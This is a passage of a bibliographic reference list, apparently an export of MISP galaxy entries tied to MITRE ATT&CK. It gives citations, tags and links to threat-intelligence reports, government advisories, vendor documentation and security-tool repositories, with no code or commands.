Table 14048. Table References

Links

https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/

Roadtools

Dirk-jan Mollema. (2020, April 16). Introducing ROADtools - The Azure AD exploration framework. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="Roadtools"

Table 14049. Table References

Links

https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/

Talos ROKRAT

Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos ROKRAT"

Table 14050. Table References

Links

https://blog.talosintelligence.com/2017/04/introducing-rokrat.html

Microsoft Open XML July 2017

Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.

The tag is: misp-galaxy:references="Microsoft Open XML July 2017"

Table 14051. Table References

Links

https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)

Securelist WhiteBear Aug 2017

Kaspersky Lab’s Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.

The tag is: misp-galaxy:references="Securelist WhiteBear Aug 2017"

Table 14052. Table References

Links

https://securelist.com/introducing-whitebear/81638/

MalwareBytes ADS July 2015

Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="MalwareBytes ADS July 2015"

Table 14053. Table References

Links

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

Apple AppleScript

Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Apple AppleScript"

Table 14054. Table References

Links

https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html

Microsoft Outlook Files

Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Microsoft Outlook Files"

Table 14055. Table References

Links

https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Microsoft Intro Print Processors

Microsoft. (2023, June 26). Introduction to print processors. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft Intro Print Processors"

Table 14056. Table References

Links

https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors

Microsoft Services

Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Services"

Table 14057. Table References

Links

https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

Red Canary NETWIRE January 2020

Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Red Canary NETWIRE January 2020"

Table 14058. Table References

Links

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

Discord Intro to Webhooks

Discord. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Discord Intro to Webhooks"

Table 14059. Table References

Links

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

GitHub Inveigh

Robertson, K. (2015, April 2). Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="GitHub Inveigh"

Table 14060. Table References

Links

https://github.com/Kevin-Robertson/Inveigh

Summit Route Malicious AMIs

Piper, S. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Summit Route Malicious AMIs"

Table 14061. Table References

Links

https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/

inv_ps_attacks

Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.

The tag is: misp-galaxy:references="inv_ps_attacks"

Table 14062. Table References

Links

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

Kazanciyan 2014

Kazanciyan, R. & Hastings, M. (2014). Defcon 22 Presentation. Investigating PowerShell Attacks [slides]. Retrieved November 3, 2014.

The tag is: misp-galaxy:references="Kazanciyan 2014"

Table 14063. Table References

Links

https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf

Beek Use of VHD Dec 2020

Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Beek Use of VHD Dec 2020"

Table 14064. Table References

Links

https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316

ESET InvisiMole June 2018

Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="ESET InvisiMole June 2018"

Table 14065. Table References

Links

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

ESET InvisiMole June 2020

Hromcova, Z. and Cherepanov, A. (2020, June). InvisiMole: The Hidden Part of the Story. Retrieved July 16, 2020.

The tag is: misp-galaxy:references="ESET InvisiMole June 2020"

Table 14066. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

GitHub OmerYa Invisi-Shell

Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="GitHub OmerYa Invisi-Shell"

Table 14067. Table References

Links

https://github.com/OmerYa/Invisi-Shell

Invoke-DOSfuscation

Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Invoke-DOSfuscation"

Table 14068. Table References

Links

https://github.com/danielbohannon/Invoke-DOSfuscation

PowerSploit Invoke Kerberoast

Schroeder, W. & Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="PowerSploit Invoke Kerberoast"

Table 14069. Table References

Links

https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/

Empire InvokeKerberoast Oct 2016

EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Empire InvokeKerberoast Oct 2016"

Table 14070. Table References

Links

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

Github PowerSploit Ninjacopy

Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="Github PowerSploit Ninjacopy"

Table 14071. Table References

Links

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Invoke-Obfuscation

Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Invoke-Obfuscation"

Table 14072. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

GitHub Invoke-Obfuscation

Bohannon, D. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="GitHub Invoke-Obfuscation"

Table 14073. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

GitHub PSImage

Barrett Adams. (n.d.). Invoke-PSImage. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="GitHub PSImage"

Table 14074. Table References

Links

https://github.com/peewpw/Invoke-PSImage

GitHub Invoke-PSImage

Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="GitHub Invoke-PSImage"

Table 14075. Table References

Links

https://github.com/peewpw/Invoke-PSImage

Wikipedia Xen

Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Wikipedia Xen"

Table 14076. Table References

Links

http://en.wikipedia.org/wiki/Xen

TechNet Ipconfig

Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Ipconfig"

Table 14077. Table References

Links

https://technet.microsoft.com/en-us/library/bb490921.aspx

cisco_ip_ssh_pubkey_ch_cmd

Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="cisco_ip_ssh_pubkey_ch_cmd"

Table 14078. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478

Symantec Chafer Dec 2015

Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Symantec Chafer Dec 2015"

Table 14079. Table References

Links

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

CISA AA20-259A Iran-Based Actor September 2020

CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="CISA AA20-259A Iran-Based Actor September 2020"

Table 14080. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

U.S. CISA Iran Voter Data November 3 2020

Cybersecurity and Infrastructure Security Agency. (2020, November 3). Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Iran Voter Data November 3 2020"

Table 14081. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-304a

ClearSky MuddyWater June 2019

ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="ClearSky MuddyWater June 2019"

Table 14082. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

Talos MuddyWater Jan 2022

Malhotra, A. and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.

The tag is: misp-galaxy:references="Talos MuddyWater Jan 2022"

Table 14083. Table References

Links

https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html

BitDefender Chafer May 2020

Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="BitDefender Chafer May 2020"

Table 14084. Table References

Links

https://www.bitdefender.com/blog/labs/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/

DHS CISA AA22-055A MuddyWater February 2022

FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="DHS CISA AA22-055A MuddyWater February 2022"

Table 14085. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

U.S. CISA Advisory November 25 2022

Cybersecurity and Infrastructure Security Agency. (2022, November 25). Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Advisory November 25 2022"

Table 14086. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a

U.S. CISA Iranian Government Actors November 19 2021

Cybersecurity and Infrastructure Security Agency. (2021, November 19). Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Iranian Government Actors November 19 2021"

Table 14087. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a

NEWSCASTER2014

Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="NEWSCASTER2014"

Table 14088. Table References

Links

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

CYBERCOM Iranian Intel Cyber January 2022

Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="CYBERCOM Iranian Intel Cyber January 2022"

Table 14089. Table References

Links

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

U.S. CISA IRGC Actors September 14 2022

Cybersecurity and Infrastructure Security Agency. (2022, September 14). Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA IRGC Actors September 14 2022"

Table 14090. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a

Secureworks Cobalt Gypsy Feb 2017

Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Secureworks Cobalt Gypsy Feb 2017"

Table 14091. Table References

Links

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

ClearSky OilRig Jan 2017

ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="ClearSky OilRig Jan 2017"

Table 14092. Table References

Links

http://www.clearskysec.com/oilrig/

FireEye MuddyWater Mar 2018

Singh, S. et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="FireEye MuddyWater Mar 2018"

Table 14093. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

Check Point APT34 April 2021

Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Check Point APT34 April 2021"

Table 14094. Table References

Links

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

Dark Reading APT39 JAN 2019

Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="Dark Reading APT39 JAN 2019"

Table 14095. Table References

Links

https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764

U.S. CISA IRGC-Affiliated PLC Activity December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 1). IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities. Retrieved December 5, 2023.

The tag is: misp-galaxy:references="U.S. CISA IRGC-Affiliated PLC Activity December 2023"

Table 14096. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a

Secureworks IRON HEMLOCK Profile

Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="Secureworks IRON HEMLOCK Profile"

Table 14097. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hemlock

Secureworks IRON HUNTER Profile

Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="Secureworks IRON HUNTER Profile"

Table 14098. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hunter

Secureworks IRON LIBERTY

Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Secureworks IRON LIBERTY"

Table 14099. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-liberty

Unit 42 IronNetInjector February 2021

Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.

The tag is: misp-galaxy:references="Unit 42 IronNetInjector February 2021"

Table 14100. Table References

Links

https://unit42.paloaltonetworks.com/ironnetinjector/

Secureworks IRON RITUAL Profile

Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON RITUAL Profile"

Table 14101. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-ritual

Trend Micro Iron Tiger April 2021

Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Trend Micro Iron Tiger April 2021"

Table 14102. Table References

Links

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

Lunghi Iron Tiger Linux

Daniel Lunghi. (2023, March 1). Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="Lunghi Iron Tiger Linux"

Table 14103. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

Secureworks IRON TILDEN Profile

Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TILDEN Profile"

Table 14104. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-tilden

Secureworks IRON TWILIGHT Profile

Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TWILIGHT Profile"

Table 14105. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-twilight

Secureworks IRON TWILIGHT Active Measures March 2017

Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.

The tag is: misp-galaxy:references="Secureworks IRON TWILIGHT Active Measures March 2017"

Table 14106. Table References

Links

https://www.secureworks.com/research/iron-twilight-supports-active-measures

Secureworks IRON VIKING

Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="Secureworks IRON VIKING"

Table 14107. Table References

Links

https://www.secureworks.com/research/threat-profiles/iron-viking

ESET Hermetic Wizard March 2022

ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targeting Ukraine. Retrieved April 10, 2022.

The tag is: misp-galaxy:references="ESET Hermetic Wizard March 2022"

Table 14108. Table References

Links

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine

Microsoft ISAPICGIRestriction 2016

Microsoft. (2016, September 26). ISAPI/CGI Restrictions <isapiCgiRestriction>. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPICGIRestriction 2016"

Table 14109. Table References

Links

https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/

Microsoft ISAPI Extension Overview 2017

Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Extension Overview 2017"

Table 14110. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)

Microsoft ISAPI Filter Overview 2017

Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Filter Overview 2017"

Table 14111. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)

iSight Sandworm Oct 2014

Ward, S. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="iSight Sandworm Oct 2014"

Table 14112. Table References

Links

https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/

CrySyS Blog TeamSpy

CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="CrySyS Blog TeamSpy"

Table 14113. Table References

Links

https://blog.crysys.hu/2013/03/teamspy/

NYTStuxnet

William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="NYTStuxnet"

Table 14114. Table References

Links

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Microsoft Issues with BITS July 2011

Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft Issues with BITS July 2011"

Table 14115. Table References

Links

https://technet.microsoft.com/library/dd939934.aspx

Ready.gov IT DRP

Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="Ready.gov IT DRP"

Table 14116. Table References

Links

https://www.ready.gov/business/implementation/IT

Security Intelligence ITG08 April 2020

Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.

The tag is: misp-galaxy:references="Security Intelligence ITG08 April 2020"

Table 14117. Table References

Links

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

Talos Frankenstein June 2019

Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="Talos Frankenstein June 2019"

Table 14118. Table References

Links

https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

AdSecurity Forging Trust Tickets

Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="AdSecurity Forging Trust Tickets"

Table 14119. Table References

Links

https://adsecurity.org/?p=1588

It’s Always DarkGate Before the Dawn

Micah Babinski. (2020, October 16). It’s Always DarkGate Before the Dawn. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="It’s Always DarkGate Before the Dawn"

Table 14120. Table References

Links

https://micahbabinski.medium.com/its-always-darkgate-before-the-dawn-d6cf1ec56f7e

CitizenLab KeyBoy Nov 2016

Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="CitizenLab KeyBoy Nov 2016"

Table 14121. Table References

Links

https://citizenlab.ca/2016/11/parliament-keyboy/

Twitter ItsReallyNick Status Update APT32 PubPrn

Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Status Update APT32 PubPrn"

Table 14122. Table References

Links

https://twitter.com/ItsReallyNick/status/944321013084573697

Trend Micro IXESHE 2012

Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Trend Micro IXESHE 2012"

Table 14123. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf

James TermServ DLL

James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="James TermServ DLL"

Table 14124. Table References

Links

https://twitter.com/james_inthe_box/status/1150495335812177920

Symantec Cicada November 2020

Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Symantec Cicada November 2020"

Table 14125. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

Carbon Black JCry May 2019

Lee, S. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Carbon Black JCry May 2019"

Table 14126. Table References

Links

https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/

ClearSky CopyKittens March 2017

ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.

The tag is: misp-galaxy:references="ClearSky CopyKittens March 2017"

Table 14127. Table References

Links

http://www.clearskysec.com/copykitten-jpost/

Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb

Joe Sandbox. (n.d.). Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Joe Sandbox 23893f035f8564dfea5030b9fdd54120d96072bb"

Table 14128. Table References

Links

https://www.joesandbox.com/analysis/1280109/0/html

Joe Slowik August 2019

Joe Slowik. (2019, August 15). CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019.

The tag is: misp-galaxy:references="Joe Slowik August 2019"

Table 14129. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

US District Court of DC Phosphorus Complaint 2019

US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="US District Court of DC Phosphorus Complaint 2019"

Table 14130. Table References

Links

https://noticeofpleadings.com/phosphorus/files/Complaint.pdf

NCSC Joint Report Public Tools

The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="NCSC Joint Report Public Tools"

Table 14131. Table References

Links

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

USG Joint Statement SolarWinds January 2021

FBI, CISA, ODNI, NSA. (2022, January 5). Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA). Retrieved March 26, 2023.

The tag is: misp-galaxy:references="USG Joint Statement SolarWinds January 2021"

Table 14132. Table References

Links

https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure

Jsc.exe - LOLBAS Project

LOLBAS. (2019, May 31). Jsc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Jsc.exe - LOLBAS Project"

Table 14133. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Jsc/

Juniper Netscreen of the Dead

Graeme Neilson. (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Juniper Netscreen of the Dead"

Table 14134. Table References

Links

https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf

Microsoft PS JEA

Microsoft. (2022, November 17). Just Enough Administration. Retrieved March 27, 2023.

The tag is: misp-galaxy:references="Microsoft PS JEA"

Table 14135. Table References

Links

https://learn.microsoft.com/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3

U.S. Justice Department GRU Botnet February 2024

Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). Retrieved February 29, 2024.

The tag is: misp-galaxy:references="U.S. Justice Department GRU Botnet February 2024"

Table 14136. Table References

Links

https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian

Azure Active Directory Reconnaisance

Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Azure Active Directory Reconnaisance"

Table 14137. Table References

Links

https://o365blog.com/post/just-looking/

Azure AD Recon

Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Azure AD Recon"

Table 14138. Table References

Links

https://o365blog.com/post/just-looking

intezer-kaiji-malware

Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="intezer-kaiji-malware"

Table 14139. Table References

Links

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Kali Redsnarf

NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="Kali Redsnarf"

Table 14140. Table References

Links

https://github.com/nccgroup/redsnarf

TrustedSignal Service Failure

Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.

The tag is: misp-galaxy:references="TrustedSignal Service Failure"

Table 14141. Table References

Links

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

Kansa Service related collectors

Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.

The tag is: misp-galaxy:references="Kansa Service related collectors"

Table 14142. Table References

Links

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

CISA Karakurt 2022

Cybersecurity Infrastructure and Defense Agency. (2022, June 2). Karakurt Data Extortion Group. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="CISA Karakurt 2022"

Table 14143. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

Kaspersky Lab SynAck May 2018

Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique. Retrieved May 24, 2018.

The tag is: misp-galaxy:references="Kaspersky Lab SynAck May 2018"

Table 14144. Table References

Links

https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging

Unit 42 Kazuar May 2017

Levene, B., et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.

The tag is: misp-galaxy:references="Unit 42 Kazuar May 2017"

